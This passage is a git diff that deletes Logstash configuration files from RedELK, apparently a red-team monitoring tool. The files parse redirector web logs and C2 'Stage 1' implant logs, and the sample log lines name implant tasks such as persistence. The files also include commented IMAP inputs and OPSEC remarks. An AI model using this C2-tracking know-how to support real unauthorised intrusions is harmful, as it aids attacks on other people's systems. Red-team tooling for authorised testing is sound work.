- } -} diff --git a/elkserver/docker/redelk-logstash/redelkinstalldata/redelk-main/conf.d/11-input_localfiles_logstash.conf b/elkserver/docker/redelk-logstash/redelkinstalldata/redelk-main/conf.d/11-input_localfiles_logstash.conf deleted file mode 100644 index 992bbf43..00000000 --- a/elkserver/docker/redelk-logstash/redelkinstalldata/redelk-main/conf.d/11-input_localfiles_logstash.conf +++ /dev/null @@ -1,15 +0,0 @@ -# Part of RedELK -# -# In this file we configure the local file inputs -# -# Author: Outflank B.V. / Marc Smeets -# - -input { - file { - path => "/var/log/redelk/redteamdomaincheck.txt" - start_position => "beginning" - type => "bluecheck" - add_field => { "bluechecktype" => "roguedomaincheck" } - } -} diff --git a/elkserver/docker/redelk-logstash/redelkinstalldata/redelk-main/conf.d/12-input_email_logstash.conf b/elkserver/docker/redelk-logstash/redelkinstalldata/redelk-main/conf.d/12-input_email_logstash.conf deleted file mode 100644 index 443c7770..00000000 --- a/elkserver/docker/redelk-logstash/redelkinstalldata/redelk-main/conf.d/12-input_email_logstash.conf +++ /dev/null @@ -1,80 +0,0 @@ -# Part of RedELK -# -# In this file we configure the logstash input for remote email resources -# -# Author: Outflank B.V. / Marc Smeets -# -# -# You need to configure this file to. Ive included a few examples for known email providers. -# A few things to note: -# - Make sure to enable IMAP at the email provider's side if required. Note, Gmail also requires 'allow less secure devices' in Gmail security settings. -# - The provider may block you if you check for email too often, are coming from a suspicious email or some other -# 'magic anti-spam measure'. It differs per provider how you should handle this (e.g. Gmail wants you to do a captcha -# from your IP at https://www.google.com/accounts/DisplayUnlockCaptcha) -# - OPSEC issue: unless you are using an outbound proxy on your RedELK host, this config will expose the RedELK's ext IP to the email provider. -# - In our testing the 'Sent' items weren't always imported from the start. A fix that seem to work is toggle all sent emails as 'unread' once -# - Folder names need to be exact, and they aren't the same at every provider. You can check the names manually by doing: -# openssl s_client -connect remote.imapprovider.com:993 -crlf -# a1 login username p4ssw0rd -# a2 LIST "" "*" -# -# - -input { - ## Outlook.com Inbox - #imap { - # host => "outlook.office365.com" - # password => "" - # user => "" - # port => 993 - # check_interval => 180 - # folder => "Inbox" - # uid_tracking => "true" - # add_field => { "infra.log.type" => "email" } - # add_field => { "infra.attack_scenario" => "test" } - # add_field => { "email_folder" => "inbox" } - # strip_attachments => "true" # we have to strip attachments for now because of a stupid bug in Logstash - #} - ## Outlook.com Sent - #imap { - # host => "outlook.office365.com" - # password => "" - # user => "" - # port => 993 - # check_interval => 180 - # folder => "Sent" - # uid_tracking => "true" - # add_field => { "infra.log.type" => "email" } - # add_field => { "infra.attack_scenario" => "test" } - # add_field => { "email_folder" => "sent" } - # strip_attachments => "true" # we have to strip attachments for now because of a stupid bug in Logstash - #} - ## Gmail.com Inbox - #imap { - # host => "imap.gmail.com" - # user => "" - # password => "" - # port => 993 - # check_interval => 180 - # folder => "Inbox" - # uid_tracking => "true" - # add_field => { "infra.log.type" => "email" } - # add_field => { "infra.attack_scenario" => "test" } - # add_field => { "email_folder" => "inbox" } - # strip_attachments => "true" # we have to strip attachments for now because of a stupid bug in Logstash - #} - ## Gmail.com Sent - #imap { - # host => "imap.gmail.com" - # user => "" - # password => "" - # port => 993 - # check_interval => 180 - # folder => "[Gmail]/Sent Mail" - # uid_tracking => "true" - # add_field => { "infra.log.type" => "email" } - # add_field => { "infra.attack_scenario" => "test" } - # add_field => { "email_folder" => "sent" } - # strip_attachments => "true" # we have to strip attachments for now because of a stupid bug in Logstash - #} -} \ No newline at end of file diff --git a/elkserver/docker/redelk-logstash/redelkinstalldata/redelk-main/conf.d/20-filter-redir-haproxy_logstash.conf b/elkserver/docker/redelk-logstash/redelkinstalldata/redelk-main/conf.d/20-filter-redir-haproxy_logstash.conf deleted file mode 100644 index f7c7f546..00000000 --- a/elkserver/docker/redelk-logstash/redelkinstalldata/redelk-main/conf.d/20-filter-redir-haproxy_logstash.conf +++ /dev/null @@ -1,207 +0,0 @@ -# Part of RedELK -# -# In this file we configure the logstash filters for HAproxy logs -# -# Author: Outflank B.V. / Marc Smeets -# - -filter { - if [infra][log][type] == "redirtraffic" and [redir][program] == "haproxy" { - - # Filebeat introduces the source field for the name of the log file path. But this collides with source object from the Elastic Common Schema. - # We have no need for the filebeat's field as its also stored in log.file.path. So we drop it. - mutate { - remove_field => [ "source" ] - } - - # drop haproxy log lines about the service starting and stopping - if "haproxy-systemd-wrapper" in [message] { - drop { } - } - if "Proxy " in [message] and " started." in [message] { - drop { } - } - # drop haproxy log lines when there is a config error - if " [ALERT] " in [message] { - drop { } - } - if " [ SSL] " in [message] { - drop { } - } - if " [ ALL] " in [message] { - drop { } - } - if " [UNIX] " in [message] { - drop { } - } - if " [STAT] " in [message] { - drop { } - } - if " [ TCP] " in [message] { - drop { } - } - if " [WARNING] " in [message] { - drop { } - } - - # Let's first trim the syslog info from the log line - grok { - match => { "message" => ["%{SYSLOGTIMESTAMP:syslogtimestamp} %{NOTSPACE:[host][name]} %{PROG:[process][name]}(?:\[%{POSINT:[process][pid]}\])?: %{GREEDYDATA:messagenosyslog}"] } - } - - mutate { - remove_field => [ "syslogtimestamp" ] - } - - # Sometimes HAproxy will report an SSL handshake failure, using a different log line. We check for that as well - if "SSL handshake failure" in [message] or "TLSv1 heartbeat attack" in [message] { - grok { - match => { "messagenosyslog" => [ "%{IPORHOST:[source][ip]}:%{POSINT:[source][port]} \[(?<[redir][timestamp]>%{MONTHDAY}\/%{MONTH}\/%{YEAR}:%{TIME})\] (?<[redir][frontend][name]>([^/]*))%{GREEDYDATA:[http][request][body][content]}" ] } - } - mutate { - add_field => { "[redir][backend][name]" => "ssl-error" } - } - # Set the timestamp from the log to @timestamp, example: 16/Sep/2018:07:08:21.783 - date { - match => [ "[redir][timestamp]", "dd/MMM/yyyy:HH:mm:ss.SSS" ] - target => "@timestamp" - timezone => "Etc/UTC" - } - } else { - # now matching the real haproxy lines. We have several log line formats we need to match: - # - Lines without X-Forwarded-For identified with "xforwardedfor:-" - # - Lines with X-Forwarded-For set, identified with "xforwardedfor:$SOMEIP" - # - any other weird sitution, i.e. cutoff lines when the log lne is larger than the redir's logbuffer size - # Sometimes HAProxy reports lines with 'message repeated X times' in it. This is inserted into the line after the SYSLOGPROG, before "frontend. So we grok match (%{GREEDYDATA})? in each line - # - # We'll walk through them one by one - # - - if "xforwardedfor:-" in [message] { - # Lines without X-Forwarded-For identified with "xforwardedfor:-" - grok { - match => { "messagenosyslog" => [ "GMT:%{HTTPDATE:[redir][timestamp]} frontend:(?<[redir][frontend][name]>([^/]*))/(([^/]*))/%{IPORHOST:[redir][frontend][ip]}:%{POSINT:[redir][frontend][port]} backend:%{NOTSPACE:[redir][backend][name]} client:%{IPORHOST:[source][ip]}:%{POSINT:[source][port]} xforwardedfor:- headers:\{\|(?<[http][headers][all]>([^\}]*))} statuscode:%{INT:[http][response][status_code]} request:%{GREEDYDATA:[http][request][body][content]}" ] } - } - } else if "request:" in [message] { - # Lines with X-Forwarded-For set. We already filtered out the 'xfordwardedfor:-', so anything left with a large enough log line should be good - grok { - match => { "messagenosyslog" => [ "GMT:%{HTTPDATE:[redir][timestamp]} frontend:(?<[redir][frontend][name]>([^/]*))/(([^/]*))/%{IPORHOST:[redir][frontend][ip]}:%{POSINT:[redir][frontend][port]} backend:%{NOTSPACE:[redir][backend][name]} client:%{IPORHOST:[source][cdn][ip]}:%{POSINT:[source][cdn][port]} xforwardedfor:%{IPORHOST:[source][ip]}(?:, )(?:%{GREEDYDATA:[source][ip_other]}) headers:\{\|(?<[http][headers][all]>([^\}]*))} statuscode:%{INT:[http][response][status_code]} request:%{GREEDYDATA:[http][request][body][content]}" ] } - add_tag => [ "redirtrafficxforwardedfor" ] - } - } else { - # catchall situation, i.e. cutoff lines when the log lne is larger than the redir's logbuffer size - grok { - match => { "messagenosyslog" => [ "GMT:%{HTTPDATE:[redir][timestamp]} frontend:(?<[redir][frontend][name]>([^/]*))/(([^/]*))/%{IPORHOST:[redir][frontend][ip]}:%{POSINT:[redir][frontend][port]} backend:%{NOTSPACE:[redir][backend][name]} %{GREEDYDATA:[redir][catchall]}" ] } - add_tag => [ "redirlongmessagecatchall" ] - } - } - - # map header values onto dedicated fields and split the values of the headersall field into an array - if [http][headers][all] { - # map to dedicated fields - grok { - match => { "[http][headers][all]" => [ "(?<[http][headers][useragent]>([^|]*))\|(?<[http][headers][host]>([^|]*))\|(?<[http][headers][x_forwarded_for]>([^|]*))\|(?<[http][headers][x_forwarded_proto]>([^|]*))\|(?<[http][headers][x_host]>([^|]*))\|(?<[http][headers][forwarded]>([^|]*))\|(?<[http][headers][via]>([^|]*))" ] } - } - - # split the values into an array - mutate { - split => { "[http][headers][all]" => "|" } - } - - # Add useragent data - if [http][headers][useragent] { - useragent { - source => "[http][headers][useragent]" - target => "[source][host_info]" - } - } - } - } - - if [messagenosyslog] { - mutate { - remove_field => [ "messagenosyslog" ] - } - } - - # Set the timestamp from the log to @timestamp, example: 15/Apr/2018:19:22:31 +0000 - date { - match => [ "[redir][timestamp]", "dd/MMM/yyyy:HH:mm:ss Z" ] - target => "@timestamp" - timezone => "Etc/UTC" - } - - # When IPv6 is enabled on your HAProxy host, IPV4 addresses are reported like ::ffff:ipv4address. Here we cut off the ::ffff: part - if "ffff" in [source][ip] { - mutate { - gsub => [ - "[source][ip]", "\:\:ffff\:", "" - ] - } - } - if "ffff" in [redir][frontend][ip] { - mutate { - gsub => [ - "[redir][frontend][ip]", "\:\:ffff\:", "" - ] - } - } - if "ffff" in [source][cdn][ip] { - mutate { - gsub => [ - "[source][cdn][ip]", "\:\:ffff\:", "" - ] - } - } - - # Add data to the redirraffic.sourceip - if [source][ip] { - # duplicate field so we can replace it with reverse DNS lookup - mutate { - add_field => { "[source][domain]" => "%{[source][ip]}" } - } - # do reverse DNS lookup - dns { - reverse => ["[source][domain]"] - action => "replace" - timeout => "2.0" - } - # add geo ip info from City DB - geoip { - source => "[source][ip]" - target => "tmpgeoip" - } - # add geo ip info from ASN DB - geoip { - source => "[source][ip]" - target => "tmpgeoip" - default_database_type => "ASN" - } - mutate { - copy => { - "[tmpgeoip][as_org]" => "[source][as][organization][name]" - "[tmpgeoip][asn]" => "[source][as][number]" - "[tmpgeoip][city_name]" => "[source][geo][city_name]" - "[tmpgeoip][country_code2]" => "[source][geo][country_iso_code]" - "[tmpgeoip][location]" => "[source][geo][location]" - "[tmpgeoip][region_code]" => "[source][geo][region_iso_code]" - "[tmpgeoip][region_name]" => "[source][geo][region_name]" - } - remove_field => [ "tmpgeoip" ] - } - } - # Add data to the redirtraffic.sourceipcdn - if [source][cdn][ip] { - # duplicate field so we can replace it with reverse DNS lookup - mutate { - add_field => { "[source][cdn][domain]" => "%{[source][cdn][ip]}" } - } - # do reverse DNS lookup - dns { - reverse => ["[source][cdn][domain]"] - action => "replace" - timeout => "2.0" - } - } - } -} diff --git a/elkserver/docker/redelk-logstash/redelkinstalldata/redelk-main/conf.d/21-filter-redir-apache_logstash.conf b/elkserver/docker/redelk-logstash/redelkinstalldata/redelk-main/conf.d/21-filter-redir-apache_logstash.conf deleted file mode 100644 index f194ff18..00000000 --- a/elkserver/docker/redelk-logstash/redelkinstalldata/redelk-main/conf.d/21-filter-redir-apache_logstash.conf +++ /dev/null @@ -1,159 +0,0 @@ -# Part of RedELK -# -# In this file we configure the logstash filters for Apache logs -# -# Author: Outflank B.V. / Marc Smeets -# Contributor: Lorenzo Bernardi -# - -filter { - if [infra][log][type] == "redirtraffic" and [redir][program] == "apache" { - - # Filebeat introduces the source field for the name of the log file path. But this collides with source object from the Elastic Common Schema. - # We have no need for the filebeat's field as its also stored in log.file.path. So we drop it. - mutate { - remove_field => [ "source" ] - } - - # Let's first trim the syslog-like info from the log line - grok { - match => { "message" => [ "\[%{HTTPDATE:[redir][timestamp]}\] (%{NOTSPACE:[host][name]}|-) %{PROG:[process][name]}(?:\[%{POSINT:[process][pid]}\]): %{GREEDYDATA:messagenosyslog}" ] } - } - - # now matching the real Apache log lines. We have several log line formats we need to match: - # - Lines without X-Forwarded-For identified with "xforwardedfor:-" - # - Lines with X-Forwarded-For set, identified with "xforwardedfor:$SOMEIP" - # - any other weird sitution, i.e. cutoff lines when the log lne is larger than the redir's logbuffer size - # - # We'll walk through them one by one - # - - if "xforwardedfor:-" in [message] { - # Lines without X-Forwarded-For identified with "xforwardedfor:-" - grok { - match => { "messagenosyslog" => [ "frontend:(?<[redir][frontend][name]>([^/]*))/%{IPORHOST:[redir][frontend][ip]}:%{POSINT:[redir][frontend][port]} backend:%{NOTSPACE:[redir][backend][name]} client:%{IPORHOST:[source][ip]}:%{POSINT:[source][port]} xforwardedfor:- headers:\{(?<[http][headers][all]>([^\}]*))} statuscode:%{INT:[http][response][status_code]} request:%{GREEDYDATA:[http][request][body][content]}" ] } - } - } else if "request:" in [message] { - # Lines with X-Forwarded-For set. We already filtered out the 'xfordwardedfor:-', so anything left with a large enough log line should be good - grok { - match => { "messagenosyslog" => [ "frontend:(?<[redir][frontend][name]>([^/]*))/%{IPORHOST:[redir][frontend][ip]}:%{POSINT:[redir][frontend][port]} backend:%{NOTSPACE:[redir][backend][name]} client:%{IPORHOST:[source][cdn][ip]}:%{POSINT:[source][cdn][port]} xforwardedfor:%{IPORHOST:[source][ip]}(?:, )(?:%{GREEDYDATA:[source][ip_other]}) headers:\{(?<[http][headers][all]>([^\}]*))} statuscode:%{INT:[http][response][status_code]} request:%{GREEDYDATA:[http][request][body][content]}" ] } - add_tag => [ "redirtrafficxforwardedfor" ] - } - } else { - # catchall situation, i.e. cutoff lines when the log lne is larger than the redir's logbuffer size - grok { - match => { "messagenosyslog" => [ "frontend:(?<[redir][frontend][name]>([^/]*))/%{IPORHOST:[redir][frontend][ip]}:%{POSINT:[redir][frontend][port]} backend:%{NOTSPACE:[redir][backend][name]} %{GREEDYDATA:[redir][catchall]}" ] } - add_tag => [ "redirlongmessagecatchall" ] - } - } - - if [messagenosyslog] { - mutate { - remove_field => [ "messagenosyslog" ] - } - } - - # map header values onto dedicated fields and split the values of the headersall field into an array - if [redirtraffic.headersall] { - # map to dedicated fields - grok { - match => { "redirtraffic.headersall" => [ "(?<[http][headers][useragent]>([^|]*))\|(?<[http][headers][host]>([^|]*))\|(?<[http][headers][x_forwarded_for]>([^|]*))\|(?<[http][headers][x_forwarded_proto]>([^|]*))\|(?<[http][headers][x_host]>([^|]*))\|(?<[http][headers][forwarded]>([^|]*))\|(?<[http][headers][via]>([^|]*))" ] } - } - - # split the values into an array - mutate { - split => { "[http][headers][all]" => "|" } - } - - # Add useragent data - if [http][headers][useragent] { - useragent { - source => "[http][headers][useragent]" - target => "[source][host_info]" - } - } - } - - # Set the timestamp from the log to @timestamp, example: 15/Apr/2018:19:22:31 +0000 - date { - match => [ "[redir][timestamp]", "dd/MMM/yyyy:HH:mm:ss Z" ] - target => "@timestamp" - timezone => "Etc/UTC" - } - - # When IPv6 is enabled on your host, IPV4 addresses can be reported like ::ffff:ipv4address. Here we cut off the ::ffff: part - if "ffff" in [source][ip] { - mutate { - gsub => [ - "[source][ip]", "\:\:ffff\:", "" - ] - } - } - if "ffff" in [redir][frontend][ip] { - mutate { - gsub => [ - "[redir][frontend][ip]", "\:\:ffff\:", "" - ] - } - } - if "ffff" in [source][cdn][ip] { - mutate { - gsub => [ - "[source][cdn][ip]", "\:\:ffff\:", "" - ] - } - } - - - # Add data to the redirraffic.sourceip - if [source][ip] { - # duplicate field so we can replace it with reverse DNS lookup - mutate { - add_field => { "[source][domain]" => "%{[source][ip]}" } - } - # do reverse DNS lookup - dns { - reverse => ["[source][domain]"] - action => "replace" - timeout => "2.0" - } - # add geo ip info from City DB - geoip { - source => "[source][ip]" - target => "tmpgeoip" - } - # add geo ip info from ASN DB - geoip { - source => "[source][ip]" - target => "tmpgeoip" - default_database_type => "ASN" - } - mutate { - copy => { - "[tmpgeoip][as_org]" => "[source][as][organization][name]" - "[tmpgeoip][asn]" => "[source][as][number]" - "[tmpgeoip][city_name]" => "[source][geo][city_name]" - "[tmpgeoip][country_code2]" => "[source][geo][country_iso_code]" - "[tmpgeoip][location]" => "[source][geo][location]" - "[tmpgeoip][region_code]" => "[source][geo][region_iso_code]" - "[tmpgeoip][region_name]" => "[source][geo][region_name]" - } - remove_field => [ "tmpgeoip" ] - } - } - - # Add data to the redirtraffic.sourceipcdn - if [source][cdn][ip] { - # duplicate field so we can replace it with reverse DNS lookup - mutate { - add_field => { "[source][cdn][domain]" => "%{[source][cdn][ip]}" } - } - # do reverse DNS lookup - dns { - reverse => ["[source][cdn][domain]"] - action => "replace" - timeout => "2.0" - } - } - } -} diff --git a/elkserver/docker/redelk-logstash/redelkinstalldata/redelk-main/conf.d/22-filter-redir-nginx_logstash.conf b/elkserver/docker/redelk-logstash/redelkinstalldata/redelk-main/conf.d/22-filter-redir-nginx_logstash.conf deleted file mode 100644 index 47f483c1..00000000 --- a/elkserver/docker/redelk-logstash/redelkinstalldata/redelk-main/conf.d/22-filter-redir-nginx_logstash.conf +++ /dev/null @@ -1,158 +0,0 @@ -# Part of RedELK -# -# In this file we configure the logstash filters for NGINX logs -# -# Author: Outflank B.V. / Marc Smeets -# Contributor: Lorenzo Bernardi -# - -filter { - if [infra][log][type] == "redirtraffic" and [redir][program] == "nginx" { - - # Filebeat introduces the source field for the name of the log file path. But this collides with source object from the Elastic Common Schema. - # We have no need for the filebeat's field as its also stored in log.file.path. So we drop it. - mutate { - remove_field => [ "source" ] - } - - # Let's first trim the syslog-like info from the log line - grok { - match => { "message" => [ "\[%{HTTPDATE:[redir][timestamp]}\] (%{NOTSPACE:[host][name]}|-) %{PROG:[process][name]}(?:\[%{POSINT:[process][pid]}\]): %{GREEDYDATA:messagenosyslog}" ] } - } - - # now matching the real log lines. We have several log line formats we need to match: - # - Lines without X-Forwarded-For identified with "xforwardedfor:-" - # - Lines with X-Forwarded-For set, identified with "xforwardedfor:$SOMEIP" - # - any other weird sitution, i.e. cutoff lines when the log lne is larger than the redir's logbuffer size - # - # We'll walk through them one by one - # - - if "xforwardedfor:-" in [message] { - # Lines without X-Forwarded-For identified with "xforwardedfor:-" - grok { - match => { "messagenosyslog" => [ "frontend:(?<[redir][frontend][name]>([^/]*))/%{IPORHOST:[redir][frontend][ip]}:%{POSINT:[redir][frontend][port]} backend:%{NOTSPACE:[redir][backend][name]} client:%{IPORHOST:[source][ip]}:%{POSINT:[source][port]} xforwardedfor:- headers:\{(?<[http][headers][all]>([^\}]*))} statuscode:%{INT:[http][response][status_code]} request:%{GREEDYDATA:[http][request][body][content]}" ] } - } - } else if "request:" in [message] { - # Lines with X-Forwarded-For set. We already filtered out the 'xfordwardedfor:-', so anything left with a large enough log line should be good - grok { - match => { "messagenosyslog" => [ "frontend:(?<[redir][frontend][name]>([^/]*))/%{IPORHOST:[redir][frontend][ip]}:%{POSINT:[redir][frontend][port]} backend:%{NOTSPACE:[redir][backend][name]} client:%{IPORHOST:[source][cdn][ip]}:%{POSINT:[source][cdn][port]} xforwardedfor:%{IPORHOST:[source][ip]}(?:, )(?:%{GREEDYDATA:[source][ip_other]}) headers:\{(?<[http][headers][all]>([^\}]*))} statuscode:%{INT:[http][response][status_code]} request:%{GREEDYDATA:[http][request][body][content]}" ] } - add_tag => [ "redirtrafficxforwardedfor" ] - } - } else { - # catchall situation, i.e. cutoff lines when the log lne is larger than the redir's logbuffer size - grok { - match => { "messagenosyslog" => [ "frontend:(?<[redir][frontend][name]>([^/]*))/%{IPORHOST:[redir][frontend][ip]}:%{POSINT:[redir][frontend][port]} backend:%{NOTSPACE:[redir][backend][name]} %{GREEDYDATA:[redir][catchall]}" ] } - add_tag => [ "redirlongmessagecatchall" ] - } - } - - if [messagenosyslog] { - mutate { - remove_field => [ "messagenosyslog" ] - } - } - - # map header values onto dedicated fields and split the values of the headersall field into an array - if [redirtraffic.headersall] { - # map to dedicated fields - grok { - match => { "[http][headers][all]" => [ "(?<[http][headers][useragent]>([^|]*))\|(?<[http][headers][host]>([^|]*))\|(?<[http][headers][x_forwarded_for]>([^|]*))\|(?<[http][headers][x_forwarded_proto]>([^|]*))\|(?<[http][headers][x_host]>([^|]*))\|(?<[http][headers][forwarded]>([^|]*))\|(?<[http][headers][via]>([^|]*))" ] } - } - - # split the values into an array - mutate { - split => { "[http][headers][all]" => "|" } - } - - # Add useragent data - if [http][headers][useragent] { - useragent { - source => "[http][headers][useragent]" - target => "[source][host_info]" - } - } - } - - # Set the timestamp from the log to @timestamp, example: 15/Apr/2018:19:22:31 +0000 - date { - match => [ "[redir][timestamp]", "dd/MMM/yyyy:HH:mm:ss Z" ] - target => "@timestamp" - timezone => "Etc/UTC" - } - - # When IPv6 is enabled on your host, IPV4 addresses can be reported like ::ffff:ipv4address. Here we cut off the ::ffff: part - if "ffff" in [source][ip] { - mutate { - gsub => [ - "[source][ip]", "\:\:ffff\:", "" - ] - } - } - if "ffff" in [redir][frontend][ip] { - mutate { - gsub => [ - "[redir][frontend][ip]", "\:\:ffff\:", "" - ] - } - } - if "ffff" in [source][cdn][ip] { - mutate { - gsub => [ - "[source][cdn][ip]", "\:\:ffff\:", "" - ] - } - } - - # Add data to the redirraffic.sourceip - if [source][ip] { - # duplicate field so we can replace it with reverse DNS lookup - mutate { - add_field => { "[source][domain]" => "%{[source][ip]}" } - } - # do reverse DNS lookup - dns { - reverse => ["[source][domain]"] - action => "replace" - timeout => "2.0" - } - # add geo ip info from City DB - geoip { - source => "[source][ip]" - target => "tmpgeoip" - } - # add geo ip info from ASN DB - geoip { - source => "[source][ip]" - target => "tmpgeoip" - default_database_type => "ASN" - } - mutate { - copy => { - "[tmpgeoip][as_org]" => "[source][as][organization][name]" - "[tmpgeoip][asn]" => "[source][as][number]" - "[tmpgeoip][city_name]" => "[source][geo][city_name]" - "[tmpgeoip][country_code2]" => "[source][geo][country_iso_code]" - "[tmpgeoip][location]" => "[source][geo][location]" - "[tmpgeoip][region_code]" => "[source][geo][region_iso_code]" - "[tmpgeoip][region_name]" => "[source][geo][region_name]" - } - remove_field => [ "tmpgeoip" ] - } - } - - # Add data to the redirtraffic.sourceipcdn - if [source][cdn][ip] { - # duplicate field so we can replace it with reverse DNS lookup - mutate { - add_field => { "[source][cdn][domain]" => "%{[source][cdn][ip]}" } - } - # do reverse DNS lookup - dns { - reverse => ["[source][cdn][domain]"] - action => "replace" - timeout => "2.0" - } - } - } -} diff --git a/elkserver/docker/redelk-logstash/redelkinstalldata/redelk-main/conf.d/30-filter-email_logstash.conf b/elkserver/docker/redelk-logstash/redelkinstalldata/redelk-main/conf.d/30-filter-email_logstash.conf deleted file mode 100644 index 1fcd1f55..00000000 --- a/elkserver/docker/redelk-logstash/redelkinstalldata/redelk-main/conf.d/30-filter-email_logstash.conf +++ /dev/null @@ -1,18 +0,0 @@ -# Part of RedELK -# -# In this file we configure the logstash filters for email inputs -# -# Author: Outflank B.V. / Marc Smeets -# - -filter { - if [infralogtype] == "email" { - - # Set the timestamp from the log to @timestamp - # example: Wed, 29 Jul 2020 10:54:29 +0200 - date { - match => [ "date", "EEE, dd MMM yyyy HH:mm:ss Z" ] - target => "@timestamp" - } - } -} diff --git a/elkserver/docker/redelk-logstash/redelkinstalldata/redelk-main/conf.d/50-filter-c2-outflankstage1_logstash.conf b/elkserver/docker/redelk-logstash/redelkinstalldata/redelk-main/conf.d/50-filter-c2-outflankstage1_logstash.conf deleted file mode 100644 index 64221ac1..00000000 --- a/elkserver/docker/redelk-logstash/redelkinstalldata/redelk-main/conf.d/50-filter-c2-outflankstage1_logstash.conf +++ /dev/null @@ -1,178 +0,0 @@ -# Part of RedELK -# -# In this file we configure the logstash filtes for Stage 1 teamserver logs -# -# Author: Outflank B.V. / Marc Smeets -# - - -filter { - if [infra][log][type] == "rtops" and [c2][program] == "stage1" { - - # since ECS host.name is filled automatically. In case of C2 server logs it should contain the same value as agent.name. Here we check and drop host.name - if [agent][name] == [host][name] { - mutate { - remove_field => [ "[host][name]" ] - } - } - - # Rules for 'events' from main.log - if [c2][log][type] == "events" { - # Get the timestamp from the log line, and get the rest of the log line - grok { - match => { "message" => "(?<[c2][timestamp]>%{YEAR}\-%{MONTHNUM}\-%{MONTHDAY} %{HOUR}\:%{MINUTE}\:%{SECOND}) UTC \*\*\* (?<[c2][message]>(.|\r|\n)*)" } - } - # Set the timestamp from the log to @timestamp - date { - match => [ "[c2][timestamp]", "YYYY-MM-dd HH:mm:ss" ] - target => "@timestamp" - timezone => "Etc/UTC" - } - - # matching remaing lines of 'events' - mutate { - replace => { "[c2][log][type]" => "events_newimplant" } - } - - # new implant - Starts with INIT or CLIENT_NEW_UID - # matching lines like: INIT stage1Uid:I9TADD99; targetHostname:DESKTOP-MGEG30S; targetUsername:CONTOSO\ieuser; targetOs:Windows 10.0 (OS Build 17763); targetPid:456; targetProcname:Stage1-Syscall_x64_Release.exe; targetArch:64; stage1Killdate:2020-06-06 12:59:40; targetIp:10.10.201.31; transportIp:192.168.96.6; - grok { - match => { "[c2][message]" => "(INIT|CLIENT_NEW_UID) stage1Uid\:(?<[implant][id]>([^;]*)); targetHostname\:(?<[host][name]>([^;]*)); targetUsername\:(?<[user][name]>([^;]*)); targetOs:%{NOTSPACE:[host][os][name]}(?:(%{SPACE}%{NOTSPACE:[host][os][version]} \(OS Build %{NOTSPACE:[host][os][kernel]}\)))?; targetPid:(?<[process][pid]>([^\;]*)); targetProcname:(?<[process][name]>([^\;]*)); targetArch:(?<[implant][arch]>([^\;]*)); stage1Killdate:(?<[implant][kill_date]>([^\;]*)); targetIp:%{IPORHOST:[host][ip_int]}; transportIp:%{IPORHOST:[host][ip_ext]};"} - } - } - - # Rules for 'implant' logs - if [c2][log][type] == "implant" { - # Get the timestamp from the log line, and get the rest of the log line - grok { - match => { "message" => "(?<[c2][timestamp]>%{YEAR}\-%{MONTHNUM}\-%{MONTHDAY} %{HOUR}\:%{MINUTE}\:%{SECOND}) UTC \*\*\* (?<[c2][message]>(.|\r|\n)*)" } - } - # Set the timestamp from the log to @timestamp - date { - match => [ "[c2][timestamp]", "YYYY-MM-dd HH:mm:ss" ] - target => "@timestamp" - timezone => "Etc/UTC" - } - - # matching lines with 'INIT' = new implants - if "INIT " in [c2][message] { - mutate { - replace => { "[c2][log][type]" => "implant_newimplant" } - } - - # new implant - Starts with INIT or CLIENT_NEW_UID - # matching lines like: INIT stage1Uid:I9TADD99; targetHostname:DESKTOP-MGEG30S; targetUsername:CONTOSO\ieuser; targetOs:Windows 10.0 (OS Build 17763); targetPid:456; targetProcname:Stage1-Syscall_x64_Release.exe; targetArch:64; stage1Killdate:2020-06-06 12:59:40; targetIp:10.10.201.31; transportIp:192.168.96.6; - grok { - match => { "[c2][message]" => "(INIT|CLIENT_NEW_UID) stage1Uid\:(?<[implant][id]>([^;]*)); targetHostname\:(?<[host][name]>([^;]*)); targetUsername\:(?<[user][name]>([^;]*)); targetOs:%{NOTSPACE:[host][os][name]}(?:(%{SPACE}%{NOTSPACE:[host][os][version]} \(OS Build %{NOTSPACE:[host][os][kernel]}\)))?; targetPid:(?<[process][pid]>([^\;]*)); targetProcname:(?<[process][name]>([^\;]*)); targetArch:(?<[implant][arch]>([^\;]*)); stage1Killdate:(?<[implant][kill_date]>([^\;]*)); targetIp:%{IPORHOST:[host][ip_int]}; transportIp:%{IPORHOST:[host][ip_ext]};"} - } - - # Now duplicate fields host.ip_int and host.ip_ext to host.ip to adhere to ECS. - if [host][ip_int] { - mutate { - add_field => { "[host][ip]" => "%{[host][ip_int]}" } - } - } - if [host][ip_ext] { - mutate { - add_field => { - "[host][domain_ext]" => "%{[host][ip_ext]}" - "[host][ip]" => "%{[host][ip_ext]}" - } - } - # do reverse DNS lookup - dns { - reverse => ["[host][domain_ext]"] - action => "replace" - timeout => "2.0" - } - # add geo ip info from City DB - geoip { - source => "[host][ip_ext]" - target => "tmpgeoip" - } - # add geo ip info from ASN DB - geoip { - source => "[host][ip_ext]" - target => "tmpgeoip" - default_database_type => "ASN" - } - mutate { - copy => { - "[tmpgeoip][as_org]" => "[host][geo][as][organization][name]" - "[tmpgeoip][asn]" => "[host][geo][as][organization][number]" - "[tmpgeoip][city_name]" => "[host][geo][city_name]" - "[tmpgeoip][country_code2]" => "[host][geo][country_iso_code]" - "[tmpgeoip][location]" => "[host][geo][location]" - "[tmpgeoip][region_code]" => "[host][geo][region_iso_code]" - "[tmpgeoip][region_name]" => "[host][geo][region_name]" - } - remove_field => [ "tmpgeoip" ] - } - } - - # now duplicate this specific log line, remove some irrelevant fields and make it ready to store in the ImplantsDB index (different output) - clone { - clones => [ "implantsdb" ] - remove_field => [ "[c2][log][type]","[c2][message]","[infra][log][type]" ] - } - } - - # matching lines with 'TASKDISTRIBUTED' = new implants - if "TASKDISTRIBUTED " in [c2][message] { - mutate { - replace => { "[c2][log][type]" => "implant_task" } - } - - # matching lines like: TASKDISTRIBUTED stage1Uid:ZPO0VW0W; taskUid:LDCG4JL38W; taskRequest:getpersistkey; taskRequestparameters:OneDrive; - grok { - match => { "[c2][message]" => "TASKDISTRIBUTED stage1Uid\:(?<[implant][id]>([^;]*)); taskUid\:(?<[implant][task_id]>([^;]*)); taskRequest\:(?<[implant][task]>([^;]*)); taskRequestparameters\:(?<[implant][task_parameters]>([^;]*));"} - } - } - - # matching lines with 'TASKRESPONSE' = new implants - if "TASKRESPONSE " in [c2][message] { - mutate { - replace => { "[c2][log][type]" => "implant_output" } - } - - # matching lines like: TASKRESPONSE stage1Uid:LA1JSTG3; taskUid:ITXHK99Z19; taskRequest:pwd; taskRequestparameters:; taskResponse:C:\Users\ieuser\Desktop; - grok { - match => { "[c2][message]" => "TASKRESPONSE 